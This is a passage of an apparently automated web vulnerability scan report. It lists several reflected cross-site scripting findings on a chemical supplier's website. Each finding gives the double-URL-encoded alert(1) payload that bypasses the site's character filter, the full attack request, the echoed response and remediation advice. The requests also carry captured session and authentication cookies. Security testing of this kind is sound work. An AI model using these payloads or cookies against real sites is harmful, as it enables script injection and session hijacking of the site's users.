bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/controllera6716";alert(1)//9969eaadf91/controller-page.html","E404") ;
   </script>
...[SNIP]...

1.253. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e59ce%2522%253balert%25281%2529%252f%252fe53797cac39 was submitted in the REST URL parameter 3. This input was echoed as e59ce";alert(1)//e53797cac39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/controller/e59ce%2522%253balert%25281%2529%252f%252fe53797cac39 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:50 GMT
Content-Length: 28919
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/controller/e59ce";alert(1)//e53797cac39","E404") ;
   </script>
...[SNIP]...

1.254. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a65%2522%253balert%25281%2529%252f%252f0e8ca9ed454 was submitted in the REST URL parameter 1. This input was echoed as 25a65";alert(1)//0e8ca9ed454 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc25a65%2522%253balert%25281%2529%252f%252f0e8ca9ed454/medialib/countries/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc25a65";alert(1)//0e8ca9ed454/medialib/countries/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.255. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 438be%2522%253balert%25281%2529%252f%252f3a529a89c2 was submitted in the REST URL parameter 2. This input was echoed as 438be";alert(1)//3a529a89c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib438be%2522%253balert%25281%2529%252f%252f3a529a89c2/countries/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:15 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib438be";alert(1)//3a529a89c2/countries/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.256. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb8d%2522%253balert%25281%2529%252f%252fee7f0bf7106 was submitted in the REST URL parameter 3. This input was echoed as 6eb8d";alert(1)//ee7f0bf7106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries6eb8d%2522%253balert%25281%2529%252f%252fee7f0bf7106/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries6eb8d";alert(1)//ee7f0bf7106/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.257. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bb6f%2522%253balert%25281%2529%252f%252f820040cd6cb was submitted in the REST URL parameter 4. This input was echoed as 7bb6f";alert(1)//820040cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states7bb6f%2522%253balert%25281%2529%252f%252f820040cd6cb/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
